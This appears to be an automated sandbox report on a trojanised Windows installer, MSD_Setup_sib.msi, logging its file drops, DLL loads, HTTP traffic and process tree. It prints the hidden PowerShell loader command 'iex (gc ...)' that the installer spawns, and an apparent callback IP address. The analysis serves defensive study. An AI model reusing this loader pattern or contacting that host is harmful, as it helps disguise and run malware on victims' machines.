Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:06 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:14 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:21 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:27 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:34 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:41 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:48 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:49:55 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:50:03 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:50:10 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressAccess-Control-Allow-Origin: *Content-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Tue, 23 Apr 2024 15:50:18 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: sjm.2.drString found in binary or memory: http://64.95.10.191/
Source: PING.EXEProcess created: 64
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5d55fb.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{5388A5D6-8B37-4242-B64C-4D72F236B407}Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56B6.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5d55fd.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5d55fd.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\5d55fd.msiJump to behavior
Source: classification engineClassification label: mal48.troj.winMSI@112/25@0/2
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML56F5.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF75C545B6812E8F01.TMPJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: MSD_Setup_sib.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 88.31%
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\MSD_Setup_sib.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 1.1.1.1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
